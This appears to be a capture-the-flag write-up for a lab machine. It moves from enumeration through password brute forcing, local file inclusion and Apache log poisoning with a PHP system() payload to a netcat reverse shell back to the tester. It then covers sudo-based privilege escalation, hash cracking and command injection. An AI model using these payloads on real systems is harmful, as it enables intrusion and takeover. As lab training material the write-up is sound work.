# Tasks
1. user flag
2. root flag

# Enumeration
## NMAP SCAN
```nmap
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 30:6a:cd:1b:0c:69:a1:3b:6c:52:f1:22:93:e0:ad:16 (RSA)
|   256 84:f4:df:87:3a:ed:f2:d6:3f:50:39:60:13:40:1f:4c (ECDSA)
|_  256 9c:1e:af:c8:8f:03:4f:8f:40:d5:48:04:6b:43:f5:c4 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Whoami?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

```

## Web
- No robots.txt
- Apache server
### Feroxbuster
```bash
200 3l        3w       54c http://10.10.158.0/logout.php  
200 45l      123w     2334c http://10.10.158.0/register.php  
302 57l       82w      922c http://10.10.158.0/news.php  
200 46l      126w     2372c http://10.10.158.0/index.php  
200 23l       55w      503c http://10.10.158.0/index.html  
302 57l       82w      922c http://10.10.158.0/dashboard.php  
302 117l       92w     1103c http://10.10.158.0/detail.php
200 3l       21w      121c http://10.10.158.0/note.txt
```
- Note says password is saved in `/home/files/pass.txt`
- Apache has a feature of including the home directory `~/files/pass.txt`.
```txt
Admin password hint :-

		admin__admin

				" __ means two numbers are there , this hint is enough I think :) "
```
- Create a python script to generate all the possible passwords
- We can create a user and login at `dashboard.php`
- We can't access `/detail.php`. It says to `find out who you are`.
- We also found this in the source code.
```html
<!-- try to use "page" as GET parameter-->
```
- Hinting towards LFI?
- Checking out `news.php` it says `I have something to tell you , it's about LFI or is it RCE or something else?`

# Exploit
- - Apache has a feature of including the home directory `~/files/pass.txt`.
```txt
Admin password hint :-

		admin__admin

				" __ means two numbers are there , this hint is enough I think :) "
```
- Create a python script to generate all the possible passwords with **YOUR PASSWORD** alternating between them.
```txt
test
admin00admin
...
test
```
- Next create a python script to generate your username and the admin's user name
```txt
test
admin
...
test
```
- Now send the request to intruder and set the attack type to pitchfork, since we're logging in and logging out as our user, we're removing the rate limit.

After a while we find this request which it's response is difference
```http
POST /index.php HTTP/1.1
Host: 10.10.158.0
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 50
Origin: http://10.10.158.0
DNT: 1
Connection: close
Referer: http://10.10.158.0/index.php
Cookie: PHPSESSID=3o5h1v8bgva2qho5ccdh5vrl4p
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

username=admin&password=admin44admin&submit=Submit
```
- We can now login as the admin.
- Now we can try for the LFI parameter on detail.php
`http://10.10.158.0/detail.php?page=/etc/passwd`
```bash
/etc/passwdroot:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
yash:x:1000:1000:yash,,,:/home/yash:/bin/bash
mysql:x:111:116:MySQL Server,,,:/nonexistent:/bin/false
files:x:1001:1001:,,,:/home/files:/bin/bash
```
- We have LFI. Can we read the apache access.log for log poisoning?
- We can read `/var/log/apache2/access.log`
- We can try to perform log poisoning.
- Let's poison through user-agent
```http
GET /detail.php?page=/var/log/apache2/access.log&cmd=whoami HTTP/1.1
Host: 10.10.158.0
User-Agent: Mozilla/5.0 <?php system($_GET['cmd']); ?> Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: PHPSESSID=3o5h1v8bgva2qho5ccdh5vrl4p
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
```
- Now let's find the `www-data` in the response.
```http
10.17.1.163 - - [09/Sep/2021:17:48:15 +0530] "GET /detail.php?page=/var/log/apache2/access.log&cmd= HTTP/1.1" 200 364279 "-" "Mozilla/5.0 www-data
 Gecko/20100101 Firefox/78.0"
```
- Now let's try for a reverse shell.
```http
GET /detail.php?page=/var/log/apache2/access.log&cmd=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|sh+-i+2>%261|nc+10.17.1.163+9001+>/tmp/f HTTP/1.1
Host: 10.10.158.0
User-Agent: Mozilla/5.0 <?php system($_GET['cmd']); ?> Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: PHPSESSID=3o5h1v8bgva2qho5ccdh5vrl4p
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
```
```http
listening on [any] 9001 ...  
connect to [10.17.1.163] from (UNKNOWN) [10.10.158.0] 48888  
sh: 0: can't access tty; job control turned off  
$ ls
```
- We have a shell now.

# Privilege Escalation
- We are user www-data
- Check out `sudo -l`
```bash
User www-data may run the following commands on safezone:  
   (files) NOPASSWD: /usr/bin/find
```
- We can escalate our privilege to user files using /usr/bin/find
```bash
www-data@safezone:/var$ sudo -u files find . -exec /bin/sh \; -quit
$ whoami  
files
```
- Check `sudo -l` for user files.
```bash
User files may run the following commands on safezone:  
   (yash) NOPASSWD: /usr/bin/id
```
- No entry from GTFObins.
- Interesting file found
```bash
-rw-r--r-- 1 root  root     105 Jan 29  2021 '.something#fake_can@be^here'
```
```bash
files:$6$BUr7qnR3$v63gy9xLoNzmUC1dNRF3GWxgexFs7Bdaa2LlqIHPvjuzr6CgKfTij/UVqOcawG/eTxOQ.UralcDBS0imrvVbc.
```
- Possible hash to crack
- It is SHA512crypt, mode 1800
- Hash cracked is `magic`
- But not much we can do except ssh into the server for a more stable shell
- Run linpeas to find interesting stuff
- We find an open port locally.
```bash
127.0.0.1:8000
```
- We can curl the port.
```bash
files@safezone:~$ curl 127.0.0.1:8000  
<html>  
<head><title>403 Forbidden</title></head>  
<body bgcolor="white">  
<center><h1>403 Forbidden</h1></center>  
<hr><center>nginx/1.14.0 (Ubuntu)</center>  
</body>  
</html>
```
- We can maybe port forward it to our server?
- We can port forward it.
- Now we can run enumeration in our machine.
## Feroxbuster
```bash
200       18l       38w      462c http://localhost:8000/login.html
200       21l       64w      578c http://localhost:8000/login.js
```
- Found source code for login
```js
if ( username == "user" && password == "pass"){
alert ("Login successfully");
```
- Brings us to `pentest.php` where we can send a Message for Yash
- Weird behavior, it reflects our value into the page, but is gone when tested with `whoami,id (),nc``
- So I guess this is command injection.
- We can try to ping our box and listen to it, I'll be capturing our packets using wireshark.
- And we get a ping back! So it is OS command injection.
- Maybe we can make it run a reverse shell?
- Create a reverse shell somewhere
```txt
/tmp/shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.17.1.163 9001 >/tmp/f
```
- Now we can just send `/tmp/shell` as our message.
- And we'll get a shell.

# Privilege Escalation to Root.
- Check `sudo -l`
```bash
User yash may run the following commands on safezone:  
   (root) NOPASSWD: /usr/bin/python3 /root/bk.py
```
- The program asks us for a filename,destination and password.
- I thought it was going to archive but it just copies the file to our destination.
- Since we're running as root, we can probably just grab the root flag from the directory.
```bash
yash@safezone:~$ sudo /usr/bin/python3 /root/bk.py
Enter filename: /root/root.txt
Enter destination: /tmp
Enter Password: 123
```
- And that worked.


